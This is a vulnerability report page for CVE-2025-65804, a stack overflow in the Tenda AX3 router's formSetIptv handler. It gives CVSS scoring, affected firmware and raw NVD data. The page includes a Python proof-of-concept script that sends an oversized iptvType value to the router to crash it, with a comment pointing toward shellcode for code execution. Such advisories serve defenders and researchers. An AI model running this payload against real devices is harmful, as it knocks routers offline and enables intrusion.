Security Vulnerability Report
中文
CVE-2025-65804 CVSS 6.5 MEDIUM

CVE-2025-65804

Published: 2025-12-08 18:15:54
Last Modified: 2025-12-11 00:03:10

Description

Tenda AX3 v16.03.12.11 contains a stack overflow in formSetIptv via the iptvType parameter, which can cause memory corruption and enable remote code execution (RCE).

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:ax3_firmware:16.03.12.11:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:ax3:-:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda AX3 v16.03.12.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-65804 PoC - Tenda AX3 formSetIptv Stack Overflow # Target: Tenda AX3 router with firmware v16.03.12.11 target_ip = "192.168.0.1" # Default Tenda router IP url = f"http://{target_ip}/goform/formSetIptv" # Generate payload with 500+ 'A' characters to trigger overflow # Adjust length based on actual buffer size payload_length = 600 iptvType = "A" * payload_length data = { "iptvType": iptvType, "iptvEnable": "1", "wanType": "dhcp", "vlanId": "100" } try: print(f"[*] Sending exploit payload to {url}") print(f"[*] Payload length: {payload_length}") response = requests.post(url, data=data, timeout=5) print(f"[*] Response status: {response.status_code}") print(f"[*] Response: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") # Note: For RCE, replace 'A' with ROP chain + shellcode

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65804", "sourceIdentifier": "[email protected]", "published": "2025-12-08T18:15:53.980", "lastModified": "2025-12-11T00:03:09.970", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tenda AX3 v16.03.12.11 contains a stack overflow in formSetIptv via the iptvType parameter, which can cause memory corruption and enable remote code execution (RCE)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ax3_firmware:16.03.12.11:*:*:*:*:*:*:*", "matchCriteriaId": "9FFD11D4-8E44-4156-9D8E-7094E36A2152"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ax3:-:*:*:*:*:*:*:*", "matchCriteriaId": "6A01F4C4-FFFF-48DD-90DB-4DD29FE57479"}]}]}], "references": [{"url": "https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formSetIptv-2aaa595a7aef8072968edc528a2d95b1", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}